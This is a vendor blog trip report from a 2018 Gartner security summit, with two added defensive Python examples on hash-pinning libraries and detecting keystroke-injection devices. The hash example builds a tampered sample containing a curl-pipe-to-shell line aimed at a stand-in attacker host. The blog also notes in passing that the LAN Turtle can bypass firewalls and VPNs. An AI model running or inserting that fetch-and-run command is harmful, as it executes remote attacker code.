Gartner Security & Risk Management Summit 2018 Trip Report
June 19, 2018
Charles Goldberg | Senior Director, Marketing

Every June, Gartner hosts a terrific security conference near Washington, D.C. called the Gartner Security & Risk Management Summit. This event is focused on the needs of senior IT and security professionals, such as CISOs, chief risk officers, architects, and IAM and network security leaders. This year there were over 3,000 attendees, 120 analyst sessions to choose from, and 200 vendors on the show floor and delivering presentations. It is a big show, but I wanted to share with you one specific observation I made about this year’s conference, and a few of the more interesting things I learned from the hackers.

I have been attending this conference for many years, and there is always a lot of emphasis on what’s new (and the hottest buzzwords). I was just reviewing last year’s trip report and thinking about how it was full of “IoT”, “Blockchain”, and of course “Digital Transformation”. This year, I felt like there was more emphasis on getting back to the basics. That is not to say there weren’t sessions on these important topics, but these hot security topics were woven into more general best-practices sessions. Just to double-check that my perception wasn’t false, I did a search on “IoT”, and only two Gartner sessions had that term in the title. “Blockchain” had five sessions; it is still a really hot security topic, but I’m pretty sure that is fewer than last year. “Digital Transformation” had only one analyst session (but a lot of vendor sessions). I know you’re thinking, what about “GDPR”? That buzzword is a very big deal in the industry now and was a hot topic throughout the event as well.

Back to basics

Many of the analysts spoke about the ever-increasing value of data.
Gartner Research Director Brian Lowans called data “the new oil” and spent his session, “The State of Data Security”, describing how important it is to set up a governance structure and to have organizations working together to identify, classify and strategically approach protecting data. Several of the analysts used the same chart (see below) to show that security solutions are beginning to reach a steady state in limiting insider threats and accidental disclosure, while the success of hackers continues to grow unabated.

Another example of back to basics was how Gartner Research Directors Gorka Sadowski and Pete Shoard took us through the State of the Threat Landscape, 2018 (see chart below). It wasn’t just a depressing litany of new attack vectors, script-kiddie tools and Korean hacker nightmare scenarios, but a very sensible approach to controlling risk. They looked at “risk” through analogies, and spoke about what can be controlled and what can’t. By focusing on what we can control, we can limit our risks. Their examples likened it to protecting against Lyme disease and the big bad wolf blowing down our piggy homes. We usually can’t prevent the threat; however, we can be very proactive about putting in good foundational practices to limit our exposure to known vulnerabilities, giving our business a strategy that “allows a prioritized approach to dealing with risks and hence, vulnerabilities”. This was a theme that continued throughout the week.

An example they shared was timely: “the inclusion of malware in organization code via malware injection in code library”. They shared examples of how this occurs on GitHub. They also talked about the difficult methods of protecting yourself (never using open source code, versus changing process and checking the MD5 hash before putting the code in use). Two caveats a practitioner would add: MD5 is collision-broken, so the pinned digest should be SHA-256 or stronger, and the expected digest has to be recorded somewhere the library’s publisher cannot edit, because an attacker who can tamper with the code in a repository can just as easily update a hash posted next to it. We all know code signing is an easy and valuable way to limit exposure, but it has to be enforced either by process or technology.
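To make the hash-checking step concrete, here is an added example (my own, not code from the Gartner presenters or from the original post) of gating a third-party library behind a digest that was pinned at review time. The sample library bytes and the tampered copy are constructed for the demonstration, and the “algo:hexdigest” pin format is an assumption of this script rather than a standard.

```python
"""Pin-and-verify a third-party code artifact before it is used."""
import hashlib
import hmac

# Digest algorithms accepted for pins. MD5 and SHA-1 are collision-broken,
# so a pin in either is refused rather than silently trusted.
ALLOWED_ALGOS = {"sha256", "sha384", "sha512"}


def record_pin(data: bytes, algo: str = "sha256") -> str:
    """Review-time step: digest the copy you actually audited.

    Store the returned "algo:hexdigest" (pin format assumed here) somewhere
    the library's publisher cannot edit: a lockfile in your own repo, a
    signed manifest, the review ticket. A hash posted next to the code on
    the same repository is changed as easily as the code itself.
    """
    if algo not in ALLOWED_ALGOS:
        raise ValueError(f"refusing to pin with weak or unknown algorithm {algo!r}")
    return f"{algo}:{hashlib.new(algo, data).hexdigest()}"


def verify_artifact(data: bytes, pin: str) -> bool:
    """Install-time step: True only if `data` hashes to the pinned digest.

    Raises ValueError for a malformed pin or a disallowed algorithm, so a
    weak pin fails loudly instead of passing as "verified".
    """
    algo, sep, expected = pin.partition(":")
    if not sep or not expected:
        raise ValueError("pin must look like 'algo:hexdigest'")
    if algo not in ALLOWED_ALGOS:
        raise ValueError(f"refusing pin with weak or unknown algorithm {algo!r}")
    actual = hashlib.new(algo, data).hexdigest()
    # Constant-time comparison costs nothing and is the habit worth keeping.
    return hmac.compare_digest(actual, expected.lower())


def load_library(data: bytes, pin: str) -> bytes:
    """The gate: hand bytes to the loader only when the pin matches."""
    if not verify_artifact(data, pin):
        raise RuntimeError("artifact digest mismatch; refusing to load")
    return data


# Constructed sample "library" (not a real package) and a tampered copy with
# one malicious line appended, standing in for the injected-code scenario.
LIBRARY = b"def helper(x):\n    return x * 2\n"
TAMPERED = LIBRARY + b"import os; os.system('curl http://attacker.example | sh')\n"

# Recorded once at review time, against the copy that was actually reviewed.
LIBRARY_PIN = record_pin(LIBRARY)

if __name__ == "__main__":
    print("clean copy verifies:   ", verify_artifact(LIBRARY, LIBRARY_PIN))    # True
    print("tampered copy verifies:", verify_artifact(TAMPERED, LIBRARY_PIN))   # False
    try:
        verify_artifact(LIBRARY, "md5:" + "0" * 32)
    except ValueError as exc:
        print("md5 pin refused:", exc)
```

The same idea is built into pip as `pip install --require-hashes -r requirements.txt`, where each requirement carries a `--hash=sha256:...` entry; the code signing the post mentions goes one step further, since the thing you pin becomes a publisher’s public key rather than a digest that has to be copied by hand for every release.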
The real fun and interesting stories came from the hackers! Gartner gave us two opportunities to see the world from the hacker’s perspective. The first was a keynote from Keren Elazari. She gave us an inspiring keynote called “Innovation Lessons We Can Learn From Hackers”. She reminded us that being a “hacker” isn’t a bad thing. Hackers are a group of people with a deep curiosity about how things work and how they can be made better, and they have high levels of creativity. She recommended working with white-hat hackers, looking for and supporting those with hacker tendencies in our organizations, creating incentives to promote positive hacker behaviors, and attending meetups and conferences to develop these skills. It was a fantastic, fun and fast-paced presentation, and I highly recommend that you watch her TED talk.

Later that afternoon, two other hackers, Jesse Krembs and Rob Fuller, joined Keren for an interesting panel discussion. This was a clever group that liked to razz each other a bit. They discussed the hacker mentality, DEF CON and other hacker events, as well as a few tricks of the trade. Two gizmos they showed off were amazing. The first was the LAN Turtle. This $60 device, once plugged in behind the firewall, gives its owner out-of-band access over 3G. White-hat hackers can put this unit in a docking station, so that it stays powered even after the laptop is removed, and they can be “on the network” to test whether the SecOps team can find the malware (which isn’t residing on a known machine). You can imagine how great this would be for testing… or just for getting around perimeter security like firewalls and VPNs.

Another takeaway from the conference: what device does every USB port allow? The keyboard, of course! I had read about how to make USB Rubber Ducky devices in the past, but now I know how easy it is to buy one. I actually see units for under $10 on the web.
Pen testers can use this device to automate running scripts on a target computer: plug in the USB “keyboard” and it types its payload at 1,000 characters per second. Since it enumerates as a standard keyboard, there is no driver to install, and the controls that block removable storage do not apply, so there is no need to worry about security or driver problems making it difficult “to run the tests”. What else can it be used for? I’ll leave that up to your imagination.

I started this blog with how insider threat events are leveling off while hacking events continue to accelerate. Using these hacker tools, the outsider immediately becomes the insider by passing through all the layers of perimeter security. This leaves any data that isn’t protected with encryption and strong access controls as exposed as a sitting duck. I could keep this blog going, but I will spare you. I hope to see you at Gartner SRM next year! Until then, keep your data safe!

Feel free to leave a comment below or follow Thales eSecurity on Twitter, LinkedIn, and Facebook.
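Because a keystroke-injection device is accepted as an ordinary keyboard, the one thing that gives it away is the typing speed the post mentions. Here is an added example (my own, not code from the panelists or from the original post) of the detection heuristic that follows from that: per-device keystroke rate over a sliding one-second window. The event stream, device names and the 15 keys-per-second threshold are constructed assumptions for the demonstration.

```python
"""Flag keyboards that type faster than any human: a keystroke-injection heuristic."""
from collections import deque

# Threshold assumptions for this example: a fast human typist sustains
# roughly 10 keys/s, so anything well above that inside a one-second window
# is treated as a device typing a scripted payload.
MAX_HUMAN_KEYS_PER_SECOND = 15
WINDOW_SECONDS = 1.0


def peak_keys_per_window(events, window=WINDOW_SECONDS):
    """events: key-down events as (timestamp_seconds, device_id), sorted by
    time. Returns device_id -> the most keys that device produced inside any
    sliding window of `window` seconds."""
    recent = {}   # device_id -> timestamps still inside the current window
    peak = {}
    for ts, dev in events:
        q = recent.setdefault(dev, deque())
        q.append(ts)
        while ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        peak[dev] = max(peak.get(dev, 0), len(q))
    return peak


def detect_injection(events, max_rate=MAX_HUMAN_KEYS_PER_SECOND, window=WINDOW_SECONDS):
    """device_id -> True if the device ever exceeded max_rate keys per second."""
    peaks = peak_keys_per_window(events, window)
    return {dev: n > max_rate * window for dev, n in peaks.items()}


def make_sample_events():
    """Constructed sample, not captured data: a person typing 40 keys at about
    6 keys/s on the built-in keyboard, and a 60-key payload typed in 60 ms by a
    newly attached device (device names are placeholders)."""
    human = [(10.0 + i * 0.17, "usb-kbd-builtin") for i in range(40)]
    injected = [(12.0 + i * 0.001, "usb-kbd-new") for i in range(60)]
    return sorted(human + injected)


if __name__ == "__main__":
    for dev, suspicious in detect_injection(make_sample_events()).items():
        print(f"{dev}: {'SUSPICIOUS' if suspicious else 'ok'}")
```

On a real host the events would come from the input layer (evdev on Linux, a raw-input hook on Windows). The heuristic is defeated by a payload that deliberately types at human speed, so treat it as a detection signal on top of, not instead of, a device allowlist such as USBGuard on Linux or the device-installation restrictions available through Group Policy on Windows.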